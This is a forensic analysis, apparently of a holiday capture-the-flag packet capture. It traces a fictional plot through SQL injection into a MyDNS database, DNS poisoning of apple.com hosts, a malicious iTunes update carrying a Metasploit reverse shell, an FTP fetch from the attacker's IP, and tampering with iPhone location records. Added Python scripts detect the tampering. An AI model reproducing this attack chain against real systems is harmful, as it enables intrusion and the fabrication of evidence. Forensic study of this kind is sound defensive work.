1 Overview
1.1 Significant events
Table 1 provides a summary of the most significant events identified and analyzed on the following pages.

#  Time   Event
1  13:51  Email from Grandma to Mel revealing a plot to frame Rudolph for her murder; the mail has hidden content which reveals Grandma's current location.
2  13:51  Probing of web server; the attacker finds that the server is vulnerable to SQL injection (source 192.168.1.10).
3  13:52  SQL injection on web server; injection of data which results in specific apple.com hosts resolving to 192.168.1.10 (DNS poisoning).
4  13:57  Rudolph's computer tries to update iTunes, but due to DNS poisoning it is redirected to a service provided by the attacker which serves a piece of malware used by the attacker to inject a set of coordinates (40.7715,-73.978833) into a backup of Rudolph's cellular phone.
Table 1: Significant events
Overview diagram (attack steps): Attacker 192.168.1.10 (Grandma); DNS and web server 172.19.79.2; Target 172.19.79.6 (Rudolph). Attacker -> DNS and web server: DNS poisoning (SQL injection). Target -> DNS and web server: uses DNS. Target -> Attacker: get iTunes update. Attacker -> Target: reverse shell, get sqlite.exe (ftp), change iPhone coordinates, delete sqlite.exe.
2 Analysis
An in-depth analysis of the most significant hosts and events found in the provided packet dump.
GET / HTTP/1.1
Host: www.santaslist.northpole
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Date: Sun, 25 Dec 2011 07:42:26 -0500 (EST)
From: Grandma <root@grandma.gma>
X-X-Sender: root@bt
To: cousinmel@mail.gma
Subject: Christmas
Message-ID: <alpine.DEB.2.02.1112250741440.7396@bt>
User-Agent: Alpine 2.02 (DEB 1266 2009-07-14)
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="04715920431324816946=:7396"
2.1.2 IP 172.19.79.2
Web server serving www.santaslist.northpole, running Apache 2.2.15 on CentOS and using PHP 5.3.2 (see snippet 3).

Snippet 3 HTTP headers from web server www.santaslist.northpole
HTTP/1.1 200 OK
Date: Sun, 25 Dec 2011 12:52:58 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
2.1.3 IP 172.19.89.6
According to the headers (see snippet 4) extracted from HTTP requests, this system is running Windows XP Professional SP3 and has an outdated version of iTunes installed (10.3.1). Furthermore, path-naming and username information were found which indicate that the owner of this system is named Rudolph, as shown in snippet 5.

Snippet 4 HTTP header from 172.19.89.6
GET /bag.xml?ix=4 HTTP/1.1
User-Agent: iTunes/10.3.1 (Windows; Microsoft Windows XP Professional Service Pack 3 (Build 2600)) AppleWebKit/533.21.1

Snippet 5 FTP session showing the backup path and username
C:\Documents and Settings\Rudolph\Application Data\Apple Computer\MobileSync\Backup\e409a4c01ece2a9e6bf9267b169f3b15616b98cd>ftp -A 192.168.1.10
[...]
Anonymous login succeeded for Rudolph@RUDOLPHPC
Dear Mel, Our plans are almost complete, and I am very excited. Soon, you and I shall be spending the rest of our days relaxing in the surf and sun! The plan is highly sensitive, a deep secret that only the two of us share. Never tell another soul about our clever scheme as long as you live. As we discussed, I recently made you the sole beneficiary of my life insurance policy. On Christmas Eve, I plan on faking my own death, which I will frame as murder on Rudolph, Santa's obnoxious reindeer. The details of my plan are included in the attached document below. Read it carefully. Merry Christmas! Grandma

Dear Mel, Here are the details of my secret plan. After the investigation turns up the evidence I plant, you provide eyewitness testimony in court, and Rudolph is convicted, you will receive the insurance payout. We can then use that money to fund our Caribbean retirement. I am not sure I ever told you this, Mel, but as a child, my village was attacked by a ravenous band of rampaging reindeer, instilling a lifelong hatred in me for the flea-bitten beasts. I'll never forget their horrible comments as they galloped through our village. Because of that chilling childhood experience, I'm going to fake my death and blame it all on Rudolph, the most well-known reindeer of all. He'll rot away in jail forever. Merry Christmas, Grandma

I will hide out at the Plaza Hotel near Central Park for several weeks, and meet you there in the lobby exactly one week after the trial concludes with a guilty verdict for Rudolph, precisely at noon local time. Make sure you bring the money in a suitcase full of cash. I'll be wearing one red shoe.
2.2.2 #2 - Probing of web server
Soon after sending the mail previously mentioned, the attacker launched a series of probes against a web server (172.19.79.2). Initially the attacker issued a few HTTP probes, shown in snippet 9; the purpose of these probes is assessed to be information gathering and identification of vulnerabilities. The attacker successfully identified a SQL injection vulnerability by injecting a single quote (hex value 27) as the value of the name parameter in the naughty list form; the server response suggesting this vulnerability is shown in snippet 10.

Snippet 9 Generic probing
GET / HTTP/1.1
POST /checklist.php HTTP/1.1
name=Grandma
name=Cousin+Mel
name=%27

Snippet 10 Server response to the injected single quote
HTTP/1.1 200 OK
Date: Sun, 25 Dec 2011 12:53:28 GMT
Server: Apache/2.2.15 (CentOS)
< CUT >
<tr><th>Name</th><th>Status</th></tr>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1</table>
</body></html>
2.2.3 #3 - SQL injection (DNS poisoning)
The attacker starts out by injecting a few SELECT queries to identify the data and schema already stored in the database; the results are displayed, enumerated, in the naughty list as shown in figure 2 on the next page. After a few queries the attacker is able to reconstruct the relevant parts of the DNS database, as shown in table 2a on page 9. The attacker then injects a single Start of Authority (SOA) record into the MYDNS soa table stating that the origin apple.com is best resolved at ns1.santaslist.northpole, which in plain English means that ns1.santaslist.northpole is the authoritative place to look up *.apple.com host names. Lastly, a series of apple.com hosts are injected into the Resource Record (rr) table stating that the specified hosts resolve to 192.168.1.10; again in plain English, this means that when a client looks up one of the injected host names it resolves to 192.168.1.10, which is the IP of the attacker. A full overview of the soa and rr tables after the attacker has successfully conducted the DNS poisoning is shown in table 2b on page 9.
Table 2a: Original soa and rr tables (as reconstructed by the attacker's SELECT queries)

Original soa table
ID  ORIGIN                NS                        MBOX
1   santaslist.northpole  ns1.santaslist.northpole  root.santaslist.northpole
Other numeric soa fields visible for this row: 604800, 28800, 86400, 7200, 25 (their column headers are not legible in the source).

Original rr table
ID  ZONE  NAME                      TYPE  DATA                      AUX  TTL
1   1     @                         NS    ns1.santaslist.northpole  0    86400
2   1     ns1.santaslist.northpole  A     172.19.79.2               0    86400
3   1     www.santaslist.northpole  A     172.19.79.2               0    86400

Table 2b: Modified soa and rr tables (after the DNS poisoning)

Modified soa table
ID  ORIGIN                NS                        MBOX
1   santaslist.northpole  ns1.santaslist.northpole  root.santaslist.northpole
2   apple.com             ns1.santaslist.northpole  root.santaslist.northpole
Other numeric soa fields visible: 604800 and 28800 for both rows; 86400, 7200, 25 (column headers not legible in the source).

Modified rr table
ID   ZONE  NAME                                        TYPE  DATA                      AUX  TTL
1    1     @                                           NS    ns1.santaslist.northpole  0    86400
2    1     (unchanged from table 2a)                   A     (unchanged from table 2a)  0    (see below)
3    1     (unchanged from table 2a)                   A     (unchanged from table 2a)  0    (see below)
4-8  2     (injected apple.com host names, not legible in the source)  A  192.168.1.10  0  (see below)
TTL values visible for rows 2 to 8: 86400, 7200, 86400, 7200 (row assignment not legible in the source).
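To check a MyDNS-style backend for the kind of tampering shown in table 2b, here is an added Python example that is not part of the original write-up; the soa and rr rows are constructed from the tables above (with placeholder names for the injected apple.com hosts, since the write-up does not list them), and the set of authoritative origins and the trusted network are assumptions.

```python
"""Flag soa zones and A records that a server authoritative only for
santaslist.northpole should never hold (rogue origins, foreign targets)."""
import ipaddress

# Constructed from table 2b: (id, origin, ns, mbox)
SOA_ROWS = [
    (1, "santaslist.northpole", "ns1.santaslist.northpole", "root.santaslist.northpole"),
    (2, "apple.com", "ns1.santaslist.northpole", "root.santaslist.northpole"),
]
# Constructed from table 2b: (id, zone, name, type, data); the injected host
# names are placeholders because the write-up does not print them
RR_ROWS = [
    (1, 1, "@", "NS", "ns1.santaslist.northpole"),
    (2, 1, "ns1.santaslist.northpole", "A", "172.19.79.2"),
    (3, 1, "www.santaslist.northpole", "A", "172.19.79.2"),
    (4, 2, "<injected-apple-host-1>", "A", "192.168.1.10"),
    (5, 2, "<injected-apple-host-2>", "A", "192.168.1.10"),
]

def find_poisoned_records(soa_rows, rr_rows, authoritative_origins, trusted_nets):
    """Return (kind, row_id, detail) tuples for every suspicious soa/rr row."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    # A zone whose origin we are not authoritative for is a rogue SOA entry
    rogue_zones = {sid: origin for sid, origin, _ns, _mbox in soa_rows
                   if origin not in authoritative_origins}
    findings = [("rogue-soa", sid, origin) for sid, origin in rogue_zones.items()]
    for rid, zone, name, rtype, data in rr_rows:
        if zone in rogue_zones:
            findings.append(("rr-in-rogue-zone", rid, name))
        # An A record pointing outside our own address space is a redirection
        if rtype == "A" and not any(ipaddress.ip_address(data) in n for n in nets):
            findings.append(("untrusted-target", rid, data))
    return findings

if __name__ == "__main__":
    for f in find_poisoned_records(SOA_ROWS, RR_ROWS,
                                   {"santaslist.northpole"}, ["172.19.79.0/24"]):
        print(f)
```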
2.2.4 #4 - Infection of Rudolph's computer
The infection process
The target is infected through a malicious iTunes update. The attacker has made arrangements, as described in 2.2.3, to make specific apple.com hosts resolve to his own machine (192.168.1.10), where he is hosting a malicious update service serving malware instead of legitimate updates; it is likely that the attacker is using EvilGrade [1] (or a similar tool) to facilitate this. The requests from the target's iTunes instance to the malicious update service are shown in table 3. An analysis of the traffic has shown that the target is using an old version of iTunes (10.3.1) which is vulnerable [2] to this specific attack vector, which allows download and execution of unsigned updates.

Client request                                              Intended host
GET /bag.xml?ix=4                                           ax.init.itunes.apple.com
GET /version?machineID=101a1a42c676ea68                     itunes.apple.com
GET /content/catalogs/others/index-windows-1.sucatalog      swcatalog.apple.com
GET /content/downloads/14/21/[SNIP]/061-4339.English.dist   swcatalog.apple.com
GET /iTunesSetup.exe                                        swcatalog.apple.com
Table 3: Update requests

The malware
After execution, the malware tries to connect back to the attacker on port 1225 using a standard TCP three-way handshake. After the connection is established the malware seemingly awaits a stimulus before acting further; this stimulus was captured in the provided PCAP and is shown in figure 3 on the following page. When comparing this stimulus with the shell.rb source code of Metasploit, as shown in figure 4 on the next page, it can be concluded with little doubt that the malware is a legitimate binary [3] wrapped with a Metasploit reverse_tcp stager, and that the actual stage used by the attacker is a shell.
[1] http://www.infobytesec.com/down/isr-evilgrade-Readme.txt
[2] Fixed in 10.5.1: http://support.apple.com/kb/HT5030?viewlocale=en_US
[3] Apache Bench - found by static analysis of the binary.
Figure 4: Metasploit source code (/modules/payloads/stages/windows/shell.rb)

A test was conducted in an isolated environment using two hosts: a Windows XP SP3 host running the malware (extracted from the PCAP) and a BackTrack 5 R2 host running Metasploit. As shown in figure 5, the test demonstrated that the malware actually works as described above.
Figure 5: Injection of shell payload.

Modification of coordinates on Rudolph's computer
At this point the attacker has shell access to Rudolph's computer, where he downloads a copy of sqlite3.exe from his own machine. The attacker uses this tool to inject a set of coordinates into a backup of Rudolph's phone's cellular location database, which is stored locally on Rudolph's computer. The coordinates and timing injected match the crime scene [4], as shown in figure 6 on the following page, which would lead a forensic investigator to conclude that Rudolph, or at least his phone, was at the crime scene when the alleged crime occurred.

Snippet 11 Command used to inject data

The manipulated cellular location database is shown in snippet 12 on the next page (the injected data is shown on line 23).
[4] Crime-scene coordinates were extracted from the photo of the crime scene: http://pen-testing.sans.org/images/challenges/holiday/evidence.jpg
Snippet 12 Manipulated cellular location database
310|410|11504|165415283|346413600.207493|90.0|0.0|1414.0|0.0|1.0|1.0|1.0|50
310|410|11560|165415876|346417200.724667|36.848461|174.763333|1414.0|0.0|1.0|1.0|1.0|50
310|410|11913|165415988|346424400.845503|33.87365|151.206889|1414.0|0.0|1.0|1.0|1.0|50
310|410|11490|165415931|346431600.789114|35.689489|139.691706|1414.0|0.0|1.0|1.0|1.0|50
310|410|11486|165415119|346433400.698928|40.332808|116.47765|1414.0|0.0|1.0|1.0|1.0|50
310|410|11387|165415444|346435200.577698|39.904214|116.407414|1414.0|0.0|1.0|1.0|1.0|50
310|410|11647|165415648|346449600.307924|55.752505|37.623168|1414.0|0.0|1.0|1.0|1.0|50
310|410|11563|165415337|346458600.605536|52.523406|13.4114|1414.0|0.0|1.0|1.0|1.0|50
310|410|11293|165419827|346460400.123529|48.858362|2.294242|1414.0|0.0|1.0|1.0|1.0|50
310|410|11245|165415050|346464000.957372|51.505624|0.075383|1414.0|0.0|1.0|1.0|1.0|50
310|410|11341|165413757|346471200.820172|22.903539|43.209587|1414.0|0.0|1.0|1.0|1.0|50
310|410|11146|165413900|346478400.428421|18.467964|66.108809|1414.0|0.0|1.0|1.0|1.0|50
310|410|11150|165413038|346480200.261264|6.42375|66.58973|1414.0|0.0|1.0|1.0|1.0|50
310|410|11342|165415572|346482000.116289|40.748245|73.985534|1414.0|0.0|1.0|1.0|1.0|50
310|410|11880|165413161|346483440.664151|43.653226|79.383184|1414.0|0.0|1.0|1.0|1.0|50
310|410|11537|165415788|346484520.528258|40.440625|79.995886|1414.0|0.0|1.0|1.0|1.0|50
310|410|11363|165415476|346485600.313375|41.8789|87.63584|1414.0|0.0|1.0|1.0|1.0|50
310|410|11686|165413799|346489201.224764|39.739094|104.984898|1414.0|0.0|1.0|1.0|1.0|50
310|410|11998|165414519|346492800.167865|37.819751|122.478168|1414.0|0.0|1.0|1.0|1.0|50
310|410|11312|165413083|346496400.422522|61.190009|149.870694|1414.0|0.0|1.0|1.0|1.0|50
310|410|11409|165413229|346500000.268656|21.307237|157.858055|1414.0|0.0|1.0|1.0|1.0|50
310|410|11504|165415284|346503600.473327|90.0|0.0|1414.0|0.0|1.0|1.0|1.0|50
310|410|11250|116541837|346471200.820172|40.7715|73.978833|1414.0|0.0|1.0|1.0|1.0|50
Figure 6: Plot of injected coordinate and crime-scene. (green arrow - same location)
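As an added example that is not part of the original write-up, the following Python checks an export like snippet 12 for the tamper evidence an examiner would look for: the injected row reuses the timestamp of an earlier row and breaks the chronological order of the table. The embedded excerpt is constructed from four of the rows shown above (rows 11, 12, 22 and 23, values as printed there); the only outside fact relied on is that the timestamp column is a CFAbsoluteTime value, i.e. seconds since 2001-01-01 UTC.

```python
"""Tamper checks for a pipe-separated cell-location export: column 5 is a
CFAbsoluteTime timestamp, columns 6 and 7 latitude and longitude. A genuine
log grows forward in time, so a row that goes backwards or duplicates an
earlier timestamp is a sign of a manual insert."""
from datetime import datetime, timedelta, timezone

# Constructed excerpt of snippet 12: rows 11, 12, 22 and the injected row 23
SAMPLE_DUMP = """\
310|410|11341|165413757|346471200.820172|22.903539|43.209587|1414.0|0.0|1.0|1.0|1.0|50
310|410|11146|165413900|346478400.428421|18.467964|66.108809|1414.0|0.0|1.0|1.0|1.0|50
310|410|11504|165415284|346503600.473327|90.0|0.0|1414.0|0.0|1.0|1.0|1.0|50
310|410|11250|116541837|346471200.820172|40.7715|73.978833|1414.0|0.0|1.0|1.0|1.0|50
"""

COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # CFAbsoluteTime zero

def cocoa_to_utc(ts):
    """Convert a CFAbsoluteTime value (seconds since 2001-01-01 UTC) to a datetime."""
    return COCOA_EPOCH + timedelta(seconds=ts)

def parse_rows(text):
    """Parse the dump into dicts; only the fields the checks need are typed."""
    rows = []
    for line in text.splitlines():
        f = line.split("|")
        rows.append({"mcc": f[0], "mnc": f[1], "lac": f[2], "cell": f[3],
                     "ts": float(f[4]), "lat": float(f[5]), "lon": float(f[6])})
    return rows

def find_time_anomalies(rows):
    """Return (row_number, reason) for rows that break the expected time ordering."""
    findings = []
    first_seen = {}  # timestamp -> row number where it first appeared
    for i, r in enumerate(rows, start=1):
        if r["ts"] in first_seen:
            findings.append((i, f"duplicates timestamp of row {first_seen[r['ts']]}"))
        if i > 1 and r["ts"] < rows[i - 2]["ts"]:
            findings.append((i, "timestamp earlier than previous row"))
        first_seen.setdefault(r["ts"], i)
    return findings

if __name__ == "__main__":
    rows = parse_rows(SAMPLE_DUMP)
    for n, reason in find_time_anomalies(rows):
        r = rows[n - 1]
        print(f"row {n}: {reason} ({cocoa_to_utc(r['ts']):%Y-%m-%d %H:%M:%S} UTC, "
              f"{r['lat']},{r['lon']})")
```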